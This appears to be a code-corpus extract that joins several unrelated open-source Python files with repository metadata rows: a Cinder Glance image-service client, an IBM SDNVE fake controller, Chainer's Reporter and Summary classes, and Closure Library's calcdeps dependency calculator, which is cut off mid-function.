retry_excs = (glanceclient.exc.ServiceUnavailable,
glanceclient.exc.InvalidEndpoint,
glanceclient.exc.CommunicationError)
num_attempts = 1 + CONF.glance_num_retries
for attempt in range(1, num_attempts + 1):
client = self.client or self._create_onetime_client(context,
version)
try:
controller = getattr(client,
kwargs.pop('controller', 'images'))
return getattr(controller, method)(*args, **kwargs)
except retry_excs as e:
netloc = self.netloc
extra = "retrying"
error_msg = _LE("Error contacting glance server "
"'%(netloc)s' for '%(method)s', "
"%(extra)s.")
if attempt == num_attempts:
extra = 'done trying'
LOG.exception(error_msg, {'netloc': netloc,
'method': method,
'extra': extra})
raise exception.GlanceConnectionFailed(reason=e)
LOG.exception(error_msg, {'netloc': netloc,
'method': method,
'extra': extra})
time.sleep(1)
except glanceclient.exc.HTTPOverLimit as e:
raise exception.ImageLimitExceeded(e)
class GlanceImageService(object):
"""Provides storage and retrieval of disk image objects within Glance."""
def __init__(self, client=None):
self._client = client or GlanceClientWrapper()
self._image_schema = None
self.temp_images = None
def detail(self, context, **kwargs):
"""Calls out to Glance for a list of detailed image information."""
params = self._extract_query_params(kwargs)
try:
images = self._client.call(context, 'list', **params)
except Exception:
_reraise_translated_exception()
_images = []
for image in images:
if self._is_image_available(context, image):
_images.append(self._translate_from_glance(context, image))
return _images
def _extract_query_params(self, params):
_params = {}
accepted_params = ('filters', 'marker', 'limit',
'sort_key', 'sort_dir')
for param in accepted_params:
if param in params:
_params[param] = params.get(param)
# NOTE(geguileo): We set is_public default value for v1 because we want
# to retrieve all images by default. We don't need to send v2
# equivalent - "visible" - because its default value when omitted is
# "public, private, shared", which will return all.
if CONF.glance_api_version <= 1:
# ensure filters is a dict
_params.setdefault('filters', {})
# NOTE(vish): don't filter out private images
_params['filters'].setdefault('is_public', 'none')
return _params
def show(self, context, image_id):
"""Returns a dict with image data for the given opaque image id."""
try:
image = self._client.call(context, 'get', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if not self._is_image_available(context, image):
raise exception.ImageNotFound(image_id=image_id)
base_image_meta = self._translate_from_glance(context, image)
return base_image_meta
def get_location(self, context, image_id):
"""Get backend storage location url.
Returns a tuple containing the direct url and locations representing
the backend storage location, or (None, None) if these attributes are
not shown by Glance.
"""
if CONF.glance_api_version == 1:
# image location not available in v1
return (None, None)
try:
# direct_url is returned by v2 api
client = GlanceClientWrapper(version=2)
image_meta = client.call(context, 'get', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if not self._is_image_available(context, image_meta):
raise exception.ImageNotFound(image_id=image_id)
# some glance stores like nfs only meta data
# is stored and returned as locations.
# so composite of two needs to be returned.
return (getattr(image_meta, 'direct_url', None),
getattr(image_meta, 'locations', None))
def add_location(self, context, image_id, url, metadata):
"""Add a backend location url to an image.
Returns a dict containing image metadata on success.
"""
if CONF.glance_api_version != 2:
raise exception.Invalid("Image API version 2 is disabled.")
client = GlanceClientWrapper(version=2)
try:
return client.call(context, 'add_location',
image_id, url, metadata)
except Exception:
_reraise_translated_image_exception(image_id)
def download(self, context, image_id, data=None):
"""Calls out to Glance for data and writes data."""
if data and 'file' in CONF.allowed_direct_url_schemes:
direct_url, locations = self.get_location(context, image_id)
urls = [direct_url] + [loc.get('url') for loc in locations or []]
for url in urls:
if url is None:
continue
parsed_url = urllib.parse.urlparse(url)
if parsed_url.scheme == "file":
# a system call to cp could have significant performance
# advantages, however we do not have the path to files at
# this point in the abstraction.
with open(parsed_url.path, "r") as f:
shutil.copyfileobj(f, data)
return
try:
image_chunks = self._client.call(context, 'data', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if not data:
return image_chunks
else:
for chunk in image_chunks:
data.write(chunk)
def create(self, context, image_meta, data=None):
"""Store the image data and return the new image object."""
sent_service_image_meta = self._translate_to_glance(image_meta)
if data:
sent_service_image_meta['data'] = data
recv_service_image_meta = self._client.call(context, 'create',
**sent_service_image_meta)
return self._translate_from_glance(context, recv_service_image_meta)
def update(self, context, image_id,
image_meta, data=None, purge_props=True):
"""Modify the given image with the new data."""
image_meta = self._translate_to_glance(image_meta)
# NOTE(dosaboy): see comment in bug 1210467
if CONF.glance_api_version == 1:
image_meta['purge_props'] = purge_props
# NOTE(bcwaldon): id is not an editable field, but it is likely to be
# passed in by calling code. Let's be nice and ignore it.
image_meta.pop('id', None)
if data:
image_meta['data'] = data
try:
# NOTE(dosaboy): the v2 api separates update from upload
if data and CONF.glance_api_version > 1:
self._client.call(context, 'upload', image_id, data)
image_meta = self._client.call(context, 'get', image_id)
else:
image_meta = self._client.call(context, 'update', image_id,
**image_meta)
except Exception:
_reraise_translated_image_exception(image_id)
else:
return self._translate_from_glance(context, image_meta)
def delete(self, context, image_id):
"""Delete the given image.
:raises: ImageNotFound if the image does not exist.
:raises: NotAuthorized if the user is not an owner.
"""
try:
self._client.call(context, 'delete', image_id)
except glanceclient.exc.NotFound:
raise exception.ImageNotFound(image_id=image_id)
return True
def _translate_from_glance(self, context, image):
"""Get image metadata from glance image.
Extract metadata from image and convert it's properties
to type cinder expected.
:param image: glance image object
:return: image metadata dictionary
"""
if CONF.glance_api_version == 2:
if self._image_schema is None:
self._image_schema = self._client.call(context, 'get',
controller='schemas',
schema_name='image',
version=2)
# NOTE(aarefiev): get base image property, store image 'schema'
# is redundant, so ignore it.
image_meta = {key: getattr(image, key)
for key in image.keys()
if self._image_schema.is_base_property(key) is True
and key != 'schema'}
# NOTE(aarefiev): nova is expected that all image properties
# (custom or defined in schema-image.json) stores in
# 'properties' key.
image_meta['properties'] = {
key: getattr(image, key) for key in image.keys()
if self._image_schema.is_base_property(key) is False}
else:
image_meta = _extract_attributes(image)
image_meta = _convert_timestamps_to_datetimes(image_meta)
image_meta = _convert_from_string(image_meta)
return image_meta
@staticmethod
def _translate_to_glance(image_meta):
image_meta = _convert_to_string(image_meta)
image_meta = _remove_read_only(image_meta)
# NOTE(tsekiyama): From the Image API v2, custom properties must
# be stored in image_meta directly, instead of the 'properties' key.
if CONF.glance_api_version >= 2:
properties = image_meta.get('properties')
if properties:
image_meta.update(properties)
del image_meta['properties']
return image_meta
@staticmethod
def _is_image_available(context, image):
"""Check image availability.
This check is needed in case Nova and Glance are deployed
without authentication turned on.
"""
# The presence of an auth token implies this is an authenticated
# request and we need not handle the noauth use-case.
if hasattr(context, 'auth_token') and context.auth_token:
return True
if image.is_public or context.is_admin:
return True
properties = image.properties
if context.project_id and ('owner_id' in properties):
return str(properties['owner_id']) == str(context.project_id)
if context.project_id and ('project_id' in properties):
return str(properties['project_id']) == str(context.project_id)
try:
user_id = properties['user_id']
except KeyError:
return False
return str(user_id) == str(context.user_id)
def _convert_timestamps_to_datetimes(image_meta):
"""Returns image with timestamp fields converted to datetime objects."""
for attr in ['created_at', 'updated_at', 'deleted_at']:
if image_meta.get(attr):
image_meta[attr] = timeutils.parse_isotime(image_meta[attr])
return image_meta
# NOTE(bcwaldon): used to store non-string data in glance metadata
def _json_loads(properties, attr):
prop = properties[attr]
if isinstance(prop, six.string_types):
properties[attr] = jsonutils.loads(prop)
def _json_dumps(properties, attr):
prop = properties[attr]
if not isinstance(prop, six.string_types):
properties[attr] = jsonutils.dumps(prop)
_CONVERT_PROPS = ('block_device_mapping', 'mappings')
def _convert(method, metadata):
metadata = copy.deepcopy(metadata)
properties = metadata.get('properties')
if properties:
for attr in _CONVERT_PROPS:
if attr in properties:
method(properties, attr)
return metadata
def _convert_from_string(metadata):
return _convert(_json_loads, metadata)
def _convert_to_string(metadata):
return _convert(_json_dumps, metadata)
def _extract_attributes(image):
# NOTE(hdd): If a key is not found, base.Resource.__getattr__() may perform
# a get(), resulting in a useless request back to glance. This list is
# therefore sorted, with dependent attributes as the end
# 'deleted_at' depends on 'deleted'
# 'checksum' depends on 'status' == 'active'
IMAGE_ATTRIBUTES = ['size', 'disk_format', 'owner',
'container_format', 'status', 'id',
'name', 'created_at', 'updated_at',
'deleted', 'deleted_at', 'checksum',
'min_disk', 'min_ram', 'protected']
if CONF.glance_api_version == 2:
IMAGE_ATTRIBUTES.append('visibility')
else:
IMAGE_ATTRIBUTES.append('is_public')
output = {}
for attr in IMAGE_ATTRIBUTES:
if attr == 'deleted_at' and not output['deleted']:
output[attr] = None
elif attr == 'checksum' and output['status'] != 'active':
output[attr] = None
else:
output[attr] = getattr(image, attr, None)
output['properties'] = getattr(image, 'properties', {})
# NOTE(jbernard): Update image properties for API version 2. For UEC
# images stored in glance, the necessary boot information is stored in the
# properties dict in version 1 so there is nothing more to do. However, in
# version 2 these are standalone fields in the GET response. This bit of
# code moves them back into the properties dict as the caller expects, thus
# producing a volume with correct metadata for booting.
for attr in ('kernel_id', 'ramdisk_id'):
value = getattr(image, attr, None)
if value:
output['properties'][attr] = value
return output
def _remove_read_only(image_meta):
IMAGE_ATTRIBUTES = ['status', 'updated_at', 'created_at', 'deleted_at']
output = copy.deepcopy(image_meta)
for attr in IMAGE_ATTRIBUTES:
if attr in output:
del output[attr]
return output
def _reraise_translated_image_exception(image_id):
"""Transform the exception for the image but keep its traceback intact."""
_exc_type, exc_value, exc_trace = sys.exc_info()
new_exc = _translate_image_exception(image_id, exc_value)
six.reraise(type(new_exc), new_exc, exc_trace)
def _reraise_translated_exception():
"""Transform the exception but keep its traceback intact."""
_exc_type, exc_value, exc_trace = sys.exc_info()
new_exc = _translate_plain_exception(exc_value)
six.reraise(type(new_exc), new_exc, exc_trace)
def _translate_image_exception(image_id, exc_value):
if isinstance(exc_value, (glanceclient.exc.Forbidden,
glanceclient.exc.Unauthorized)):
return exception.ImageNotAuthorized(image_id=image_id)
if isinstance(exc_value, glanceclient.exc.NotFound):
return exception.ImageNotFound(image_id=image_id)
if isinstance(exc_value, glanceclient.exc.BadRequest):
return exception.Invalid(exc_value)
return exc_value
def _translate_plain_exception(exc_value):
if isinstance(exc_value, (glanceclient.exc.Forbidden,
glanceclient.exc.Unauthorized)):
return exception.NotAuthorized(exc_value)
if isinstance(exc_value, glanceclient.exc.NotFound):
return exception.NotFound(exc_value)
if isinstance(exc_value, glanceclient.exc.BadRequest):
return exception.Invalid(exc_value)
return exc_value
def get_remote_image_service(context, image_href):
"""Create an image_service and parse the id from the given image_href.
The image_href param can be an href of the form
'http://example.com:9292/v1/images/b8b2c6f7-7345-4e2f-afa2-eedaba9cbbe3',
or just an id such as 'b8b2c6f7-7345-4e2f-afa2-eedaba9cbbe3'. If the
image_href is a standalone id, then the default image service is returned.
:param image_href: href that describes the location of an image
:returns: a tuple of the form (image_service, image_id)
"""
# NOTE(bcwaldon): If image_href doesn't look like a URI, assume its a
# standalone image ID
if '/' not in str(image_href):
image_service = get_default_image_service()
return image_service, image_href
try:
(image_id, glance_netloc, use_ssl) = _parse_image_ref(image_href)
glance_client = GlanceClientWrapper(context=context,
netloc=glance_netloc,
use_ssl=use_ssl)
except ValueError:
raise exception.InvalidImageRef(image_href=image_href)
image_service = GlanceImageService(client=glance_client)
return image_service, image_id
def get_default_image_service():
return GlanceImageService()
| apache-2.0 | 3,188,328,500,356,321,000 | 37.404724 | 79 | 0.594046 | false |
zhhf/charging | charging/plugins/ibm/sdnve_api_fake.py | 19 | 2081 | # Copyright 2014 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Mohammad Banikazemi, IBM Corp.
from neutron.openstack.common import log as logging
from neutron.plugins.ibm.common import constants
LOG = logging.getLogger(__name__)
HTTP_OK = 200
class FakeClient():
'''Fake Client for SDNVE controller.'''
def __init__(self, **kwargs):
LOG.info(_('Fake SDNVE controller initialized'))
def sdnve_list(self, resource, **_params):
LOG.info(_('Fake SDNVE controller: list'))
return (HTTP_OK, None)
def sdnve_show(self, resource, specific, **_params):
LOG.info(_('Fake SDNVE controller: show'))
return (HTTP_OK, None)
def sdnve_create(self, resource, body):
LOG.info(_('Fake SDNVE controller: create'))
return (HTTP_OK, None)
def sdnve_update(self, resource, specific, body=None):
LOG.info(_('Fake SDNVE controller: update'))
return (HTTP_OK, None)
def sdnve_delete(self, resource, specific):
LOG.info(_('Fake SDNVE controller: delete'))
return (HTTP_OK, None)
def sdnve_get_tenant_byid(self, id):
LOG.info(_('Fake SDNVE controller: get tenant by id'))
return id, constants.TENANT_TYPE_OF
def sdnve_check_and_create_tenant(self, id, network_type=None):
LOG.info(_('Fake SDNVE controller: check and create tenant'))
return id
def sdnve_get_controller(self):
LOG.info(_('Fake SDNVE controller: get controller'))
return None
| apache-2.0 | -199,917,980,902,874,100 | 31.515625 | 78 | 0.663623 | false |
chainer/chainer | chainer/reporter.py | 1 | 14250 | from __future__ import absolute_import
import collections
import contextlib
import copy
import json
import threading
import typing as tp # NOQA
import warnings
import numpy
import six
import chainer
from chainer import backend
from chainer import configuration
from chainer import serializer as serializer_module
from chainer import variable
import chainerx
_thread_local = threading.local()
def _copy_variable(value):
if isinstance(value, variable.Variable):
return copy.copy(value)
return value
class Reporter(object):
"""Object to which observed values are reported.
Reporter is used to collect values that users want to watch. The reporter
object holds a mapping from value names to the actually observed values.
We call this mapping `observations`.
When a value is passed to the reporter, an object called `observer` can be
optionally attached. In this case, the name of the observer is added as the
prefix of the value name. The observer name should be registered
beforehand.
See the following example:
>>> from chainer import Reporter, report, report_scope
>>>
>>> reporter = Reporter()
>>> observer = object() # it can be an arbitrary (reference) object
>>> reporter.add_observer('my_observer', observer)
>>> observation = {}
>>> with reporter.scope(observation):
... reporter.report({'x': 1}, observer)
...
>>> observation
{'my_observer/x': 1}
There are also a global API to add values:
>>> reporter = Reporter()
>>> observation = {}
>>> with reporter:
... with report_scope(observation):
... report({'x': 1})
...
>>> observation
{'x': 1}
The most important application of Reporter is to report observed values
from each link or chain in the training and validation procedures.
:class:`~chainer.training.Trainer` and some extensions prepare their own
Reporter object with the hierarchy of the target link registered as
observers. We can use :func:`report` function inside any links and chains
to report the observed values (e.g., training loss, accuracy, activation
statistics, etc.).
Attributes:
observation: Dictionary of observed values.
"""
def __init__(self):
self._observer_names = {}
self.observation = {}
def __enter__(self):
"""Makes this reporter object current."""
_get_reporters().append(self)
def __exit__(self, exc_type, exc_value, traceback):
"""Recovers the previous reporter object to the current."""
_get_reporters().pop()
@contextlib.contextmanager
def scope(self, observation):
"""Creates a scope to report observed values to ``observation``.
This is a context manager to be passed to ``with`` statements. In this
scope, the observation dictionary is changed to the given one.
It also makes this reporter object current.
Args:
observation (dict): Observation dictionary. All observations
reported inside of the ``with`` statement are written to this
dictionary.
"""
old = self.observation
self.observation = observation
self.__enter__()
try:
yield
finally:
self.__exit__(None, None, None)
self.observation = old
def add_observer(self, name, observer):
"""Registers an observer of values.
Observer defines a scope of names for observed values. Values observed
with the observer are registered with names prefixed by the observer
name.
Args:
name (str): Name of the observer.
observer: The observer object. Note that the reporter distinguishes
the observers by their object ids (i.e., ``id(owner)``), rather
than the object equality.
"""
self._observer_names[id(observer)] = name
def add_observers(self, prefix, observers):
"""Registers multiple observers at once.
This is a convenient method to register multiple objects at once.
Args:
prefix (str): Prefix of each name of observers.
observers: Iterator of name and observer pairs.
"""
for name, observer in observers:
self._observer_names[id(observer)] = prefix + name
def report(self, values, observer=None):
"""Reports observed values.
The values are written with the key, prefixed by the name of the
observer object if given.
.. note::
If a value is of type :class:`~chainer.Variable`, the
variable is copied without preserving the computational graph and
the new variable object purged from the graph is stored to the
observer. This behavior can be changed by setting
``chainer.config.keep_graph_on_report`` to ``True``.
Args:
values (dict): Dictionary of observed values.
observer: Observer object. Its object ID is used to retrieve the
observer name, which is used as the prefix of the registration
name of the observed value.
"""
if not configuration.config.keep_graph_on_report:
values = {k: _copy_variable(v) for k, v in six.iteritems(values)}
if observer is not None:
observer_id = id(observer)
if observer_id not in self._observer_names:
raise KeyError(
'Given observer is not registered to the reporter.')
observer_name = self._observer_names[observer_id]
for key, value in six.iteritems(values):
name = '%s/%s' % (observer_name, key)
self.observation[name] = value
else:
self.observation.update(values)
def _get_reporters():
try:
reporters = _thread_local.reporters
except AttributeError:
reporters = _thread_local.reporters = []
return reporters
def get_current_reporter():
"""Returns the current reporter object."""
return _get_reporters()[-1]
def report(values, observer=None):
"""Reports observed values with the current reporter object.
Any reporter object can be set current by the ``with`` statement. This
function calls the :meth:`Reporter.report` method of the current reporter.
If no reporter object is current, this function does nothing.
.. admonition:: Example
The most typical example is a use within links and chains. Suppose that
a link is registered to the current reporter as an observer (for
example, the target link of the optimizer is automatically registered to
the reporter of the :class:`~chainer.training.Trainer`). We can report
some values from the link as follows::
class MyRegressor(chainer.Chain):
def __init__(self, predictor):
super(MyRegressor, self).__init__(predictor=predictor)
def __call__(self, x, y):
# This chain just computes the mean absolute and squared
# errors between the prediction and y.
pred = self.predictor(x)
abs_error = F.sum(abs(pred - y)) / len(x)
loss = F.mean_squared_error(pred, y)
# Report the mean absolute and squared errors.
chainer.report({
'abs_error': abs_error,
'squared_error': loss,
}, self)
return loss
If the link is named ``'main'`` in the hierarchy (which is the default
name of the target link in the
:class:`~chainer.training.updaters.StandardUpdater`),
these reported values are
named ``'main/abs_error'`` and ``'main/squared_error'``. If these values
are reported inside the :class:`~chainer.training.extensions.Evaluator`
extension, ``'validation/'`` is added at the head of the link name, thus
the item names are changed to ``'validation/main/abs_error'`` and
``'validation/main/squared_error'`` (``'validation'`` is the default
name of the Evaluator extension).
Args:
values (dict): Dictionary of observed values.
observer: Observer object. Its object ID is used to retrieve the
observer name, which is used as the prefix of the registration name
of the observed value.
"""
reporters = _get_reporters()
if reporters:
current = reporters[-1]
current.report(values, observer)
@contextlib.contextmanager
def report_scope(observation):
"""Returns a report scope with the current reporter.
This is equivalent to ``get_current_reporter().scope(observation)``,
except that it does not make the reporter current redundantly.
"""
current = _get_reporters()[-1]
old = current.observation
current.observation = observation
yield
current.observation = old
class Summary(object):
"""Online summarization of a sequence of scalars.
Summary computes the statistics of given scalars online.
"""
def __init__(self):
self._x = 0.0
self._x2 = 0.0
self._n = 0
def add(self, value, weight=1):
"""Adds a scalar value.
Args:
value: Scalar value to accumulate. It is either a NumPy scalar or
a zero-dimensional array (on CPU or GPU).
weight: An optional weight for the value. It is a NumPy scalar or
a zero-dimensional array (on CPU or GPU).
Default is 1 (integer).
"""
if isinstance(value, chainerx.ndarray):
# ChainerX arrays does not support inplace assignment if it's
# connected to the backprop graph.
value = value.as_grad_stopped()
with chainer.using_device(backend.get_device_from_array(value)):
self._x += weight * value
self._x2 += weight * value * value
self._n += weight
def compute_mean(self):
"""Computes the mean."""
x, n = self._x, self._n
with chainer.using_device(backend.get_device_from_array(x)):
return x / n
def make_statistics(self):
"""Computes and returns the mean and standard deviation values.
Returns:
tuple: Mean and standard deviation values.
"""
x, n = self._x, self._n
xp = backend.get_array_module(x)
with chainer.using_device(backend.get_device_from_array(x)):
mean = x / n
var = self._x2 / n - mean * mean
std = xp.sqrt(var)
return mean, std
def serialize(self, serializer):
try:
self._x = serializer('_x', self._x)
self._x2 = serializer('_x2', self._x2)
self._n = serializer('_n', self._n)
except KeyError:
warnings.warn('The previous statistics are not saved.')
class DictSummary(object):
"""Online summarization of a sequence of dictionaries.
``DictSummary`` computes the statistics of a given set of scalars online.
It only computes the statistics for scalar values and variables of scalar
values in the dictionaries.
"""
def __init__(self):
self._summaries = collections.defaultdict(Summary)
def add(self, d):
"""Adds a dictionary of scalars.
Args:
d (dict): Dictionary of scalars to accumulate. Only elements of
scalars, zero-dimensional arrays, and variables of
zero-dimensional arrays are accumulated. When the value
is a tuple, the second element is interpreted as a weight.
"""
summaries = self._summaries
for k, v in six.iteritems(d):
w = 1
if isinstance(v, tuple):
w = v[1]
v = v[0]
if isinstance(w, variable.Variable):
w = w.array
if not numpy.isscalar(w) and not getattr(w, 'ndim', -1) == 0:
raise ValueError(
'Given weight to {} was not scalar.'.format(k))
if isinstance(v, variable.Variable):
v = v.array
if numpy.isscalar(v) or getattr(v, 'ndim', -1) == 0:
summaries[k].add(v, weight=w)
def compute_mean(self):
"""Creates a dictionary of mean values.
It returns a single dictionary that holds a mean value for each entry
added to the summary.
Returns:
dict: Dictionary of mean values.
"""
return {name: summary.compute_mean()
for name, summary in six.iteritems(self._summaries)}
def make_statistics(self):
"""Creates a dictionary of statistics.
It returns a single dictionary that holds mean and standard deviation
values for every entry added to the summary. For an entry of name
``'key'``, these values are added to the dictionary by names ``'key'``
and ``'key.std'``, respectively.
Returns:
dict: Dictionary of statistics of all entries.
"""
stats = {}
for name, summary in six.iteritems(self._summaries):
mean, std = summary.make_statistics()
stats[name] = mean
stats[name + '.std'] = std
return stats
def serialize(self, serializer):
if isinstance(serializer, serializer_module.Serializer):
names = list(self._summaries.keys())
serializer('_names', json.dumps(names))
for index, name in enumerate(names):
self._summaries[name].serialize(
serializer['_summaries'][str(index)])
else:
self._summaries.clear()
try:
names = json.loads(serializer('_names', ''))
except KeyError:
warnings.warn('The names of statistics are not saved.')
return
for index, name in enumerate(names):
self._summaries[name].serialize(
serializer['_summaries'][str(index)])
| mit | -8,370,592,927,157,155,000 | 32.928571 | 79 | 0.603368 | false |
foxbitbr/testnet | jsdev/closure-library/closure/bin/calcdeps.py | 71 | 18576 | #!/usr/bin/env python
#
# Copyright 2006 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Calculates JavaScript dependencies without requiring Google's build system.
This tool is deprecated and is provided for legacy users.
See build/closurebuilder.py and build/depswriter.py for the current tools.
It iterates over a number of search paths and builds a dependency tree. With
the inputs provided, it walks the dependency tree and outputs all the files
required for compilation.
"""
try:
import distutils.version
except ImportError:
# distutils is not available in all environments
distutils = None
import logging
import optparse
import os
import re
import subprocess
import sys
_BASE_REGEX_STRING = '^\s*goog\.%s\(\s*[\'"](.+)[\'"]\s*\)'
req_regex = re.compile(_BASE_REGEX_STRING % 'require')
prov_regex = re.compile(_BASE_REGEX_STRING % 'provide')
ns_regex = re.compile('^ns:((\w+\.)*(\w+))$')
version_regex = re.compile('[\.0-9]+')
def IsValidFile(ref):
"""Returns true if the provided reference is a file and exists."""
return os.path.isfile(ref)
def IsJsFile(ref):
"""Returns true if the provided reference is a Javascript file."""
return ref.endswith('.js')
def IsNamespace(ref):
"""Returns true if the provided reference is a namespace."""
return re.match(ns_regex, ref) is not None
def IsDirectory(ref):
"""Returns true if the provided reference is a directory."""
return os.path.isdir(ref)
def ExpandDirectories(refs):
"""Expands any directory references into inputs.
Description:
Looks for any directories in the provided references. Found directories
are recursively searched for .js files, which are then added to the result
list.
Args:
refs: a list of references such as files, directories, and namespaces
Returns:
A list of references with directories removed and replaced by any
.js files that are found in them. Also, the paths will be normalized.
"""
result = []
for ref in refs:
if IsDirectory(ref):
# Disable 'Unused variable' for subdirs
# pylint: disable=unused-variable
for (directory, subdirs, filenames) in os.walk(ref):
for filename in filenames:
if IsJsFile(filename):
result.append(os.path.join(directory, filename))
else:
result.append(ref)
return map(os.path.normpath, result)
class DependencyInfo(object):
"""Represents a dependency that is used to build and walk a tree."""
def __init__(self, filename):
self.filename = filename
self.provides = []
self.requires = []
def __str__(self):
return '%s Provides: %s Requires: %s' % (self.filename,
repr(self.provides),
repr(self.requires))
def BuildDependenciesFromFiles(files):
"""Build a list of dependencies from a list of files.
Description:
Takes a list of files, extracts their provides and requires, and builds
out a list of dependency objects.
Args:
files: a list of files to be parsed for goog.provides and goog.requires.
Returns:
A list of dependency objects, one for each file in the files argument.
"""
result = []
filenames = set()
for filename in files:
if filename in filenames:
continue
# Python 3 requires the file encoding to be specified
if (sys.version_info[0] < 3):
file_handle = open(filename, 'r')
else:
file_handle = open(filename, 'r', encoding='utf8')
try:
dep = CreateDependencyInfo(filename, file_handle)
result.append(dep)
finally:
file_handle.close()
filenames.add(filename)
return result
def CreateDependencyInfo(filename, source):
"""Create dependency info.
Args:
filename: Filename for source.
source: File-like object containing source.
Returns:
A DependencyInfo object with provides and requires filled.
"""
dep = DependencyInfo(filename)
for line in source:
if re.match(req_regex, line):
dep.requires.append(re.search(req_regex, line).group(1))
if re.match(prov_regex, line):
dep.provides.append(re.search(prov_regex, line).group(1))
return dep
def BuildDependencyHashFromDependencies(deps):
"""Builds a hash for searching dependencies by the namespaces they provide.
Description:
Dependency objects can provide multiple namespaces. This method enumerates
the provides of each dependency and adds them to a hash that can be used
to easily resolve a given dependency by a namespace it provides.
Args:
deps: a list of dependency objects used to build the hash.
Raises:
Exception: If a multiple files try to provide the same namepace.
Returns:
A hash table { namespace: dependency } that can be used to resolve a
dependency by a namespace it provides.
"""
dep_hash = {}
for dep in deps:
for provide in dep.provides:
if provide in dep_hash:
raise Exception('Duplicate provide (%s) in (%s, %s)' % (
provide,
dep_hash[provide].filename,
dep.filename))
dep_hash[provide] = dep
return dep_hash
def CalculateDependencies(paths, inputs):
"""Calculates the dependencies for given inputs.
Description:
This method takes a list of paths (files, directories) and builds a
searchable data structure based on the namespaces that each .js file
provides. It then parses through each input, resolving dependencies
against this data structure. The final output is a list of files,
including the inputs, that represent all of the code that is needed to
compile the given inputs.
Args:
paths: the references (files, directories) that are used to build the
dependency hash.
inputs: the inputs (files, directories, namespaces) that have dependencies
that need to be calculated.
Raises:
Exception: if a provided input is invalid.
Returns:
A list of all files, including inputs, that are needed to compile the given
inputs.
"""
deps = BuildDependenciesFromFiles(paths + inputs)
search_hash = BuildDependencyHashFromDependencies(deps)
result_list = []
seen_list = []
for input_file in inputs:
if IsNamespace(input_file):
namespace = re.search(ns_regex, input_file).group(1)
if namespace not in search_hash:
raise Exception('Invalid namespace (%s)' % namespace)
input_file = search_hash[namespace].filename
if not IsValidFile(input_file) or not IsJsFile(input_file):
raise Exception('Invalid file (%s)' % input_file)
seen_list.append(input_file)
file_handle = open(input_file, 'r')
try:
for line in file_handle:
if re.match(req_regex, line):
require = re.search(req_regex, line).group(1)
ResolveDependencies(require, search_hash, result_list, seen_list)
finally:
file_handle.close()
result_list.append(input_file)
# All files depend on base.js, so put it first.
base_js_path = FindClosureBasePath(paths)
if base_js_path:
result_list.insert(0, base_js_path)
else:
logging.warning('Closure Library base.js not found.')
return result_list
def FindClosureBasePath(paths):
"""Given a list of file paths, return Closure base.js path, if any.
Args:
paths: A list of paths.
Returns:
The path to Closure's base.js file including filename, if found.
"""
for path in paths:
pathname, filename = os.path.split(path)
if filename == 'base.js':
f = open(path)
is_base = False
# Sanity check that this is the Closure base file. Check that this
# is where goog is defined. This is determined by the @provideGoog
# flag.
for line in f:
if '@provideGoog' in line:
is_base = True
break
f.close()
if is_base:
return path
def ResolveDependencies(require, search_hash, result_list, seen_list):
"""Takes a given requirement and resolves all of the dependencies for it.
Description:
A given requirement may require other dependencies. This method
recursively resolves all dependencies for the given requirement.
Raises:
Exception: when require does not exist in the search_hash.
Args:
require: the namespace to resolve dependencies for.
search_hash: the data structure used for resolving dependencies.
result_list: a list of filenames that have been calculated as dependencies.
This variable is the output for this function.
seen_list: a list of filenames that have been 'seen'. This is required
for the dependency->dependant ordering.
"""
if require not in search_hash:
raise Exception('Missing provider for (%s)' % require)
dep = search_hash[require]
if not dep.filename in seen_list:
seen_list.append(dep.filename)
for sub_require in dep.requires:
ResolveDependencies(sub_require, search_hash, result_list, seen_list)
result_list.append(dep.filename)
def GetDepsLine(dep, base_path):
"""Returns a JS string for a dependency statement in the deps.js file.
Args:
dep: The dependency that we're printing.
base_path: The path to Closure's base.js including filename.
"""
return 'goog.addDependency("%s", %s, %s);' % (
GetRelpath(dep.filename, base_path), dep.provides, dep.requires)
def GetRelpath(path, start):
"""Return a relative path to |path| from |start|."""
# NOTE: Python 2.6 provides os.path.relpath, which has almost the same
# functionality as this function. Since we want to support 2.4, we have
# to implement it manually. :(
path_list = os.path.abspath(os.path.normpath(path)).split(os.sep)
start_list = os.path.abspath(
os.path.normpath(os.path.dirname(start))).split(os.sep)
common_prefix_count = 0
for i in range(0, min(len(path_list), len(start_list))):
if path_list[i] != start_list[i]:
break
common_prefix_count += 1
# Always use forward slashes, because this will get expanded to a url,
# not a file path.
return '/'.join(['..'] * (len(start_list) - common_prefix_count) +
path_list[common_prefix_count:])
def PrintLine(msg, out):
out.write(msg)
out.write('\n')
def PrintDeps(source_paths, deps, out):
"""Print out a deps.js file from a list of source paths.
Args:
source_paths: Paths that we should generate dependency info for.
deps: Paths that provide dependency info. Their dependency info should
not appear in the deps file.
out: The output file.
Returns:
True on success, false if it was unable to find the base path
to generate deps relative to.
"""
base_path = FindClosureBasePath(source_paths + deps)
if not base_path:
return False
PrintLine('// This file was autogenerated by calcdeps.py', out)
excludesSet = set(deps)
for dep in BuildDependenciesFromFiles(source_paths + deps):
if not dep.filename in excludesSet:
PrintLine(GetDepsLine(dep, base_path), out)
return True
def PrintScript(source_paths, out):
for index, dep in enumerate(source_paths):
PrintLine('// Input %d' % index, out)
f = open(dep, 'r')
PrintLine(f.read(), out)
f.close()
def GetJavaVersion():
"""Returns the string for the current version of Java installed."""
proc = subprocess.Popen(['java', '-version'], stderr=subprocess.PIPE)
proc.wait()
version_line = proc.stderr.read().splitlines()[0]
return version_regex.search(version_line.decode('utf-8')).group()
def FilterByExcludes(options, files):
